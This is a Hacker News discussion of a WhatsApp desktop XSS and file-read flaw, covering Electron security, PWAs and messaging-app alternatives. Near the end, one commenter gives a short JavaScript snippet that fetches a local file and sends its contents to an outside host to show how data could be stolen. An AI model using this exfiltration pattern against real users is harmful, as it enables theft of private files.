[HN Gopher] I found a WhatsApp security flaw that allowed hacker...
___________________________________________________________________
I found a WhatsApp security flaw that allowed hackers to read the file system
Author : ccmpx
Score : 254 points
Date : 2020-02-04 16:35 UTC (6 hours ago)
(HTM) web link (www.perimeterx.com)
(TXT) w3m dump (www.perimeterx.com)

| kjaftaedi wrote:
| Very nice work! Also curious what kind of bounty was paid out for
| this.
| Deimorz wrote:
| The article originally said that he received a $12,500 bounty
| for it, but it looks like that's been removed now (maybe you're
| not supposed to say).
|
| You can still see it at both the top and bottom of this
| archived copy:
| https://web.archive.org/web/20200204164053/http://www.perime...
| luckydata wrote:
| half of Jeff Bezos' net worth.
| oarsinsync wrote:
| > If you're going to use Electron, you HAVE to make sure it is
| updated with each update of Chromium.
|
| I never really thought about this, but in retrospect, this is so
| blindingly obvious, and is almost certainly a potential exploit
| vector to a wide range of electron-based apps.
| lima wrote:
| It sure is. This is why Chrome apps and progressive web apps
| are great - they share the Chrome runtime and inherit its
| hardening, security properties and updates.
|
| Many Electron apps should just be a PWA instead, and many
| actually are. Why would I want to install a desktop app for
| WhatsApp? It runs just fine in Chrome, and using More Tools ->
| Create shortcut..., you can even create a launcher entry that
| will launch the page in its own window.
| randall wrote:
| This needs to be distributable by the website... also with
| caching guarantees, desktop capture support (which I think is
| there now, but wasn't till just recently) etc.
| vbezhenar wrote:
| How do I build an installer for a Chrome PWA? Like if the user does
| not have Chrome, it should install it.
| Also I don't want to
| bother the user with that implicitly installed Chrome, so it
| should not add shortcuts, etc. and just live as an app
| launcher.
| shawnz wrote:
| Don't bundle Chrome, just let the user use whatever browser
| they prefer. AFAIK Edge also supports PWAs, but not Firefox
| Desktop yet.
| onei wrote:
| Turns out a PWA works in Firefox too [1] so I'm not sure
| it's entirely necessary to force a user to install a
| browser just for your app. Edge is/will be chromium, so I
| guess Safari is the only major browser to worry about?
|
| [1] https://blog.mozilla.org/firefox/progressive-web-apps-whats-...
| m-p-3 wrote:
| IMO you shouldn't have to make an installer, it should be
| the browser's job to expose the feature and integrate
| itself to the OS as natively as possible.
| bitL wrote:
| Because of the inability of a PWA to write local files at desired
| locations (you can at best download a file), a PWA's usefulness
| is limited as a desktop app replacement technology. The
| moment you allow rw local file access you are off to
| security-fun-land.
| sayhello wrote:
| I beg to disagree :-)
|
| I've worked on the Native File System API on Chrome.
|
| It's available through Origin Trial at the moment.
|
| That said, Web apps can currently emulate reading files and
| writing to disk.
|
| Take a look at this library, which also works as a polyfill:
|
| https://github.com/tomayac/browser-nativefs
| bitL wrote:
| IIRC there was a feud between Chrome developers who
| wanted raw file access and Firefox ones who didn't want
| it. W3C sided with FF, so we can't build proper desktop
| apps using PWA, even if WASM makes them quite fast these
| days. Now Chrome devs resuscitated the attempt with the NFS
| API, so I'll grab my popcorn and watch their interaction
| one more time...
| lima wrote:
| Right, but this is a small minority of applications.
| tonyarkles wrote:
| I strongly strongly disagree!
|
| The vast majority of the work I do can be done off-line
| with files stored on disk, minus stuff that obviously
| needs connectivity (e.g. Slack). Writing text, writing
| code, reading/editing documents and spreadsheets, doing
| CAD (mechanical and electronics), etc. During the week I
| live in the city, but on weekends and occasionally for
| longer stretches of time I like to head out to our rural
| house for peace and quiet (and focused work). Over time,
| the number of applications that _ought_ to work off-line
| has been slowly shrinking, whether it's because they
| insist on using cloud storage instead of local storage,
| or licensing checks, or whatever. It's really really
| disappointing, and I would personally be delighted if I
| could get work done without an Internet connection.
| shawnz wrote:
| You can design a PWA that works offline with local files
| on disk already, by using the browser's file select
| dialogs. It's not necessary to give the app arbitrary
| access to the whole filesystem to get that functionality,
| which is what the parent is asking for.
| tonyarkles wrote:
| I'm genuinely not all that familiar with what PWAs can
| and can't do... Would a, for example, Word-like PWA be
| able to both load and save files to disk?
| tptacek wrote:
| The big problem with Electron isn't that it forces you to keep
| up with Chrome, although that's important too, but rather that
| it links Node.js with content-controlled Javascript, so that
| DOM corruption vulnerabilities can be leveraged for RCE, even
| in the absence of a Chrome vulnerability. Most Electron RCEs
| that you've read about had nothing to do with Chromium.
|
| There's a whole process for evaluating and auditing Electron
| applications, which is harder to do than auditing (for
| instance) a native mobile application or, probably, even a
| native desktop application.
| Invictus0 wrote:
| Can you imagine reading this comment 100 years ago?
| ASalazarMX wrote:
| They would be amazed, as this sounds like incredibly
| advanced technology, and maybe disappointed when they find
| it was all about imaginary objects in an interactive
| projector.
|
| John Titor would be proud.
| stingraycharles wrote:
| Why would they need a node process? Are there things an
| Electron app needs to do that isn't possible from the Chrome
| runtime? And more importantly, why would they need to
| directly link with the DOM?
|
| Sorry, I am not very familiar with Electron.
| tptacek wrote:
| Since bridging Node.js with the DOM is basically the whole
| point of Electron, it's a little tough for me to answer
| this question. Yes, there are things Electron apps need to
| do that you can't do from standard Chrome.
| bhaavan wrote:
| I think it is a good idea to containerize all electron apps,
| and run them only in containers. It is because reducing the
| surface area of your code to the system will reduce
| vulnerabilities of your code.
| imvetri wrote:
| TLDR: 1. Altering the text of someone else's reply. 2. Altering
| banner image of someone else's reply containing links. 3,4,5.
| Good.
| Dinux wrote:
| I'm a heavy WhatsApp user and I feel like WhatsApp has gone
| downhill ever since Facebook took over. Performance is down
| significantly, I experience a lot more visible bugs, more and
| more exploits are being revealed about seemingly trivial
| components (file encryption, browser XSS), and useless features
| are being added. It's not like WhatsApp Inc. was flawless before
| they got acquired, but at least it worked well and most of the
| developers _actually_ wanted to make a great chat app.
|
| It's just a matter of time before Facebook merges WhatsApp with
| its Messenger (and keeps either of those names).
| Stubb wrote:
| Signal and Telegram are both solid alternatives built around
| different security models. When I get a notification in
| Messenger, Instagram, etc., I simply reply back with my contact
| info for those apps.
| Telegram gives you a vanity URL using your
| username, which is pretty cool.
| Dinux wrote:
| Yes I am using Signal. It's just that most people around me
| are not on Signal. Trying to convince them to switch is
| useless (although I try). WhatsApp is not my first choice
| either.
| _jal wrote:
| Tell them no.
|
| My perspective is, pick one of the many overlapping
| channels we already share or don't bother me. I am not
| signing up to yet another spyware-of-the-month app in order
| to chase your fashion sense.
| roel_v wrote:
| Whatsapp has been the default choice for 10 years. From
| other people's pov, Signal and Telegram are the 'fashion'
| apps.
| kelnos wrote:
| It's a trade off. In some cases not installing the
| messaging app du jour means being left out of group
| chats. If that's ok with you, then by all means, allow
| yourself to be excluded. But that's not ok with everyone.
| meowface wrote:
| They would say the same of you, from their perspective.
| It's like someone asking you for your Twitter and you
| replying that you only use Mastodon.
| petre wrote:
| I plainly tell them to e-mail me or contact me via Wire or
| Signal.
|
| Maybe this whole Bezos affair would convince them it's
| insecure spyware from yours truly Facebook and their
| friends in the UAE? I think not.
| roywiggins wrote:
| The Signal desktop app is also Electron, isn't it?
| joecool1029 wrote:
| Correct, as of a few years ago. Previously, it used to be a
| Chrome app (I think NaCL crap?)
| roel_v wrote:
| People often say this, but I wonder if they've actually used
| those apps. For example Signal, try to back up your chat
| history. The hoops you have to jump through are not feasible
| for non-technical users. There were many more relatively
| small issues like this (I tried switching 6 months ago) but I
| forgot most.
|
| For a basic 'send text message from user A to user B' app,
| there are lots of options. Something that is as convenient as
| Whatsapp though - there are none.
| Shoetp wrote:
| I've been using Telegram for something like 5 years now.
| I'm curious, what's the problem with it?
| akerro wrote:
| How come WhatsApp has so many security flaws recently and
| Signal isn't affected? This cannot be coincidence, right? Signal
| has fewer people working on it, no massive corporation behind the
| product, more people as smart as Moxie working on it. I don't
| believe these flaws are just bugs... Right?
| kelnos wrote:
| Signal has a team of people behind it whose main focus is
| security and privacy. Of course everyone makes security
| mistakes, but I'd expect the Signal team to make fewer of them.
|
| In this case, I would say the fewer people working on Signal is
| a strength, not a weakness.
| bhaavan wrote:
| What is the basis of the assertion that "Signal isn't
| affected"? Do you track CVEs for Signal?
| wiredfool wrote:
| Wonder what other electron apps have issues like this, or at
| least did until they quickly updated their electron version.
| Priem19 wrote:
| Well of course you did, it's WhatsApp. That's like saying "I
| found a health concern with smoking cigarettes."
| vmchale wrote:
| sounds like the whatsapp developers are gunning to be acquihired
| by the DNC
| kome wrote:
| i'm starting to think that Durov was right after all...
| mrnobody_67 wrote:
| This is probably how the Saudis got the data off Jeff's phone...
| boring_twenties wrote:
| You think Bezos was running the desktop/Electron app on his
| phone?
| Dinux wrote:
| He could have used the OSX desktop app. But the Bezos thing
| seems to be unrelated (as far as I can tell).
| h1fra wrote:
| wow, testing for `alert()` in a javascript environment is like
| the first thing you learn. Feels bad for whatsapp engineers :/
| dancemethis1 wrote:
| They are busy tampering with OpenWhisper.
| robocat wrote:
| Someone should create a nice little canary.js that reports on
| alert() etc. being called by setting window.alert = function
| honeypotFunction(){...};.
| Although perhaps the noise from
| extensions and users would make the signal too useless.
| dmurray wrote:
| He didn't really demonstrate how "hackers" could read the file
| system, right? The screenshot of etc/hosts is on the same
| computer where that hosts file lives.
|
| > There are more than 5 different 1-day RCEs in Chromium 69 or
| higher, you just need to find a published one and use it through
| the persistent XSS found earlier and BAM: Remote Code Execution
| ACHIEVED!
|
| > I did not take the time to actually exploit a public RCE
|
| The XSS vulnerability is serious and looks fully deserving of a
| bug bounty. Likewise, using an old version of Electron is asking
| for trouble. But for me this PoC should include the extra step of
| "just" exploiting one of the RCE holes he's sure must exist.
| JoshTriplett wrote:
| > He didn't really demonstrate how "hackers" could read the
| file system, right? The screenshot of etc/hosts is on the same
| computer where that hosts file lives.
|
| If you can fetch arbitrary URLs, and the contents of local
| files, you can trivially exfiltrate the latter with the former.
| Just fetch the local file, then fetch a URL that encodes the
| contents of the local file.
|
|     // fetch() resolves to a Response, so the body has to be read before it is used
|     const text = await (await fetch("/local/secret/file")).text();
|     fetch("https://example.org/" + encodeURIComponent(text));
| nebulous1 wrote:
| > He didn't really demonstrate how "hackers" could read the
| file system, right? The screenshot of etc/hosts is on the same
| computer where that hosts file lives.
|
| Are you saying he could alert it but not exfiltrate it?
___________________________________________________________________
(page generated 2020-02-04 23:00 UTC)